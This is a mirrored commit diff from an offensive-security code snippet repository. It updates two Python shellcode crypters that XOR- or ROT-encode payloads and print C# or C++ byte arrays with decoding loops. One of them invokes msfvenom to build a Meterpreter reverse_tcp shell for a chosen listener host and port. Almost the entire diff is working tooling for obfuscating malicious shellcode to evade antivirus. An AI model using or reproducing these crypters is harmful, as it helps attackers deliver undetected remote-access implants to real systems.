mirror of
https://github.com/chvancooten/OSEP-Code-Snippets
synced 2026-06-08 13:32:22 +00:00
Enhance shellcode crypters, add CPP output support
This commit is contained in:
@@ -25,7 +25,8 @@ def auto_int(x):
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("path", help="the path to load the raw shellcode payload from", nargs='?', default="/tmp/payload.bin")
|
||||
parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
|
||||
parser.add_argument("format", help="the language to format the output in ('cs' or 'cpp')", nargs='?', default="cs")
|
||||
parser.add_argument("encoding", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
|
||||
parser.add_argument("key", help="the key to encode the payload with (integer)", type=auto_int, nargs='?', default=randint(1,255))
|
||||
args = parser.parse_args()
|
||||
|
||||
@@ -36,51 +37,101 @@ try:
|
||||
payload = f.read()
|
||||
|
||||
except:
|
||||
print(f'{bcolors.BOLD}{bcolors.FAIL}[-] Cannot read file:', args.path)
|
||||
exit(1)
|
||||
|
||||
# Encode the payload with the chosen type and key
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{hex(args.key)}{bcolors.ENDC}")
|
||||
encodedPayload = []
|
||||
payloadFormatted = ""
|
||||
for byte in payload:
|
||||
byteInt = int(byte)
|
||||
|
||||
if args.type == "xor":
|
||||
byteInt = byteInt ^ args.key
|
||||
elif args.type == "rot":
|
||||
byteInt = byteInt + args.key & 255
|
||||
else:
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
|
||||
|
||||
encodedPayload.append("{0:#0{1}x}".format(byteInt,4))
|
||||
exit(f'{bcolors.BOLD}{bcolors.FAIL}[-] Cannot read file: {args.path}{bcolors.ENDC}')
|
||||
|
||||
# Format the output payload
|
||||
payLen = len(encodedPayload)
|
||||
encodedPayload = re.sub("(.{65})", "\\1\n", ','.join(encodedPayload), 0, re.DOTALL)
|
||||
payloadFormatted += f"// Payload {args.type}-encoded with key {hex(args.key)}\n"
|
||||
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{encodedPayload}\n}};"
|
||||
if payLen > 1000:
|
||||
f = open("/tmp/payload.txt", "w")
|
||||
f.write(payloadFormatted)
|
||||
f.close()
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+]{bcolors.OKBLUE} Encoded payload written to {bcolors.OKGREEN}/tmp/payload.txt{bcolors.OKBLUE} in CSharp format!{bcolors.ENDC}")
|
||||
if args.format == "cs":
|
||||
# Encode the payload with the chosen type and key
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{hex(args.key)}{bcolors.ENDC}")
|
||||
encodedPayload = []
|
||||
payloadFormatted = ""
|
||||
for byte in payload:
|
||||
byteInt = int(byte)
|
||||
|
||||
if args.encoding == "xor":
|
||||
byteInt = byteInt ^ args.key
|
||||
elif args.encoding == "rot":
|
||||
byteInt = byteInt + args.key & 255
|
||||
else:
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
|
||||
|
||||
encodedPayload.append("{0:#0{1}x}".format(byteInt,4))
|
||||
|
||||
payLen = len(encodedPayload)
|
||||
encodedPayload = re.sub("(.{65})", "\\1\n", ','.join(encodedPayload), 0, re.DOTALL)
|
||||
payloadFormatted += f"// Payload {args.encoding}-encoded with key {hex(args.key)}\n"
|
||||
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{encodedPayload.strip()}\n}};"
|
||||
if payLen > 1000:
|
||||
f = open("/tmp/payload.txt", "w")
|
||||
f.write(payloadFormatted)
|
||||
f.close()
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+]{bcolors.OKBLUE} Encoded payload written to {bcolors.OKGREEN}/tmp/payload.txt{bcolors.OKBLUE} in CSharp format!{bcolors.ENDC}")
|
||||
else:
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+]{bcolors.OKBLUE} Encoded payload (CSharp):{bcolors.ENDC}")
|
||||
print(payloadFormatted + "\n")
|
||||
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
|
||||
if args.encoding == "xor":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
|
||||
}}"""
|
||||
|
||||
if args.encoding == "rot":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
|
||||
}}"""
|
||||
|
||||
print(decodingFunc)
|
||||
|
||||
elif args.format == "cpp":
|
||||
# Encode the payload with the chosen type and key
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{hex(args.key)}{bcolors.ENDC}")
|
||||
encodedPayload = []
|
||||
payloadFormatted = ""
|
||||
for byte in payload:
|
||||
byteInt = int(byte)
|
||||
|
||||
if args.encoding == "xor":
|
||||
byteInt = byteInt ^ args.key
|
||||
elif args.encoding == "rot":
|
||||
byteInt = byteInt + args.key & 255
|
||||
else:
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
|
||||
|
||||
encodedPayload.append(f"\\x{byteInt:02x}")
|
||||
|
||||
payLen = len(encodedPayload)
|
||||
encodedPayload = re.sub("(.{68})", " \"\\1\"\n", ''.join(encodedPayload), 0, re.DOTALL)
|
||||
payloadFormatted += f"// Payload {args.encoding}-encoded with key {hex(args.key)}\n"
|
||||
payloadFormatted += f"unsigned char buffer[] = \n {encodedPayload.strip()};"
|
||||
if payLen > 1000:
|
||||
f = open("/tmp/payload.txt", "w")
|
||||
f.write(payloadFormatted)
|
||||
f.close()
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+]{bcolors.OKBLUE} Encoded payload written to {bcolors.OKGREEN}/tmp/payload.txt{bcolors.OKBLUE} in C++ format!{bcolors.ENDC}")
|
||||
else:
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+]{bcolors.OKBLUE} Encoded payload (C++):{bcolors.ENDC}")
|
||||
print(payloadFormatted + "\n")
|
||||
|
||||
# Provide the decoding function for the heck of it
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
|
||||
if args.encoding == "xor":
|
||||
decodingFunc = f"""char bufferx[sizeof buffer];
|
||||
int i;
|
||||
for (i = 0; i < sizeof bufferx; ++i)
|
||||
bufferx[i] = (char)(buffer[i] ^ {hex(args.key)});
|
||||
"""
|
||||
|
||||
if args.encoding == "rot":
|
||||
decodingFunc = f"""char bufferx[sizeof buffer];
|
||||
int i;
|
||||
for (i = 0; i < sizeof bufferx; ++i)
|
||||
bufferx[i] = (char)(buffer[i] - {hex(args.key)} & 255);
|
||||
"""
|
||||
|
||||
print(decodingFunc)
|
||||
|
||||
else:
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+]{bcolors.OKBLUE} Encoded payload (CSharp):{bcolors.ENDC}")
|
||||
print(payloadFormatted + "\n")
|
||||
|
||||
# Provide the decoding function for the heck of it
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
|
||||
if args.type == "xor":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
|
||||
}}"""
|
||||
|
||||
if args.type == "rot":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
|
||||
}}"""
|
||||
|
||||
print(decodingFunc)
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid formatting type (choose 'cs' for CSharp or 'cpp' for C++).{bcolors.ENDC}")
|
||||
@@ -20,11 +20,15 @@ class bcolors:
|
||||
BOLD = '\033[1m'
|
||||
|
||||
# Parse input arguments
|
||||
def auto_int(x):
|
||||
return int(x, 0)
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("lhost", help="listener IP to use")
|
||||
parser.add_argument("lport", help="listener port to use")
|
||||
parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
|
||||
parser.add_argument("key", help="the key to encode the payload with (integer)", type=int, nargs='?', default=randint(1,255))
|
||||
parser.add_argument("format", help="the language to format the output in ('cs' or 'cpp')", nargs='?', default="cs")
|
||||
parser.add_argument("encoding", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
|
||||
parser.add_argument("key", help="the key to encode the payload with (integer)", type=auto_int, nargs='?', default=randint(1,255))
|
||||
parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp")
|
||||
args = parser.parse_args()
|
||||
|
||||
@@ -38,47 +42,99 @@ if result.returncode != 0:
|
||||
# Get the payload bytes and split them
|
||||
payload = re.search(r"{([^}]+)}", result.stdout.decode("utf-8")).group(1).replace('\n', '').split(",")
|
||||
|
||||
# Encode the payload with the chosen type and key
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.type}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
|
||||
for i, byte in enumerate(payload):
|
||||
byteInt = int(byte, 16)
|
||||
|
||||
if args.type == "xor":
|
||||
byteInt = byteInt ^ args.key
|
||||
elif args.type == "rot":
|
||||
byteInt = byteInt + args.key & 255
|
||||
else:
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
|
||||
|
||||
payload[i] = "{0:#0{1}x}".format(byteInt,4)
|
||||
|
||||
# Format the output payload
|
||||
payLen = len(payload)
|
||||
payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
|
||||
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
|
||||
payloadFormatted += f"// {args.type}-encoded with key {hex(args.key)}\n"
|
||||
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload}\n}};"
|
||||
if payLen > 1000:
|
||||
f = open("/tmp/payload.txt", "w")
|
||||
f.write(payloadFormatted)
|
||||
f.close()
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
|
||||
if args.format == "cs":
|
||||
# Encode the payload with the chosen type and key
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
|
||||
for i, byte in enumerate(payload):
|
||||
byteInt = int(byte, 16)
|
||||
|
||||
if args.encoding == "xor":
|
||||
byteInt = byteInt ^ args.key
|
||||
elif args.encoding == "rot":
|
||||
byteInt = byteInt + args.key & 255
|
||||
else:
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
|
||||
|
||||
payload[i] = "{0:#0{1}x}".format(byteInt,4)
|
||||
|
||||
payLen = len(payload)
|
||||
payload = re.sub("(.{65})", "\\1\n", ','.join(payload), 0, re.DOTALL)
|
||||
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
|
||||
payloadFormatted += f"// {args.encoding}-encoded with key {hex(args.key)}\n"
|
||||
payloadFormatted += f"byte[] buf = new byte[{str(payLen)}] {{\n{payload.strip()}\n}};"
|
||||
if payLen > 1000:
|
||||
f = open("/tmp/payload.txt", "w")
|
||||
f.write(payloadFormatted)
|
||||
f.close()
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in CSharp format!{bcolors.ENDC}")
|
||||
else:
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
|
||||
print(payloadFormatted + "\n")
|
||||
|
||||
# Provide the decoding function for the heck of it
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
|
||||
if args.encoding == "xor":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
|
||||
}}"""
|
||||
|
||||
if args.encoding == "rot":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
|
||||
}}"""
|
||||
|
||||
print(decodingFunc)
|
||||
|
||||
elif args.format == "cpp":
|
||||
# Encode the payload with the chosen type and key
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Encoding payload with type {bcolors.OKGREEN}{args.encoding}{bcolors.OKBLUE} and key {bcolors.OKGREEN}{args.key}{bcolors.ENDC}")
|
||||
encodedPayload = []
|
||||
for byte in payload:
|
||||
byteInt = int(byte, 16)
|
||||
|
||||
if args.encoding == "xor":
|
||||
byteInt = byteInt ^ args.key
|
||||
elif args.encoding == "rot":
|
||||
byteInt = byteInt + args.key & 255
|
||||
else:
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid encoding type.{bcolors.ENDC}")
|
||||
|
||||
encodedPayload.append(f"\\x{byteInt:02x}")
|
||||
|
||||
payLen = len(encodedPayload)
|
||||
payload = re.sub("(.{64})", " \"\\1\"\n", ''.join(encodedPayload), 0, re.DOTALL)
|
||||
payloadFormatted = f"// msfvenom -p {args.payload} LHOST={args.lhost} LPORT={args.lport} EXITFUNC=thread -f csharp\n"
|
||||
payloadFormatted += f"// {args.encoding}-encoded with key {hex(args.key)}\n"
|
||||
payloadFormatted += f"unsigned char buffer[] =\n {payload.strip()};"
|
||||
if payLen > 1000:
|
||||
f = open("/tmp/payload.txt", "w")
|
||||
f.write(payloadFormatted)
|
||||
f.close()
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload written to '/tmp/payload.txt' in C++ format!{bcolors.ENDC}")
|
||||
else:
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (C++):{bcolors.ENDC}")
|
||||
print(payloadFormatted + "\n")
|
||||
|
||||
# Provide the decoding function for the heck of it
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
|
||||
if args.encoding == "xor":
|
||||
decodingFunc = f"""char bufferx[sizeof buffer];
|
||||
int i;
|
||||
for (i = 0; i < sizeof bufferx; ++i)
|
||||
bufferx[i] = (char)(buffer[i] ^ {hex(args.key)});
|
||||
"""
|
||||
|
||||
if args.encoding == "rot":
|
||||
decodingFunc = f"""char bufferx[sizeof buffer];
|
||||
int i;
|
||||
for (i = 0; i < sizeof bufferx; ++i)
|
||||
bufferx[i] = (char)(buffer[i] - {hex(args.key)} & 255);
|
||||
"""
|
||||
|
||||
print(decodingFunc)
|
||||
|
||||
else:
|
||||
print(f"{bcolors.BOLD}{bcolors.OKGREEN}[+] Encoded payload (CSharp):{bcolors.ENDC}")
|
||||
print(payloadFormatted + "\n")
|
||||
|
||||
# Provide the decoding function for the heck of it
|
||||
print(f"{bcolors.BOLD}{bcolors.OKBLUE}[i] Decoding function:{bcolors.ENDC}")
|
||||
if args.type == "xor":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)((uint)buf[i] ^ {hex(args.key)});
|
||||
}}"""
|
||||
|
||||
if args.type == "rot":
|
||||
decodingFunc = f"""for (int i = 0; i < buf.Length; i++)
|
||||
{{
|
||||
buf[i] = (byte)(((uint)buf[i] - {hex(args.key)}) & 0xFF);
|
||||
}}"""
|
||||
|
||||
print(decodingFunc)
|
||||
exit(f"{bcolors.BOLD}{bcolors.FAIL}[x] ERROR: Invalid formatting type (choose 'cs' for CSharp or 'cpp' for C++).{bcolors.ENDC}")
|
||||
Reference in New Issue
Block a user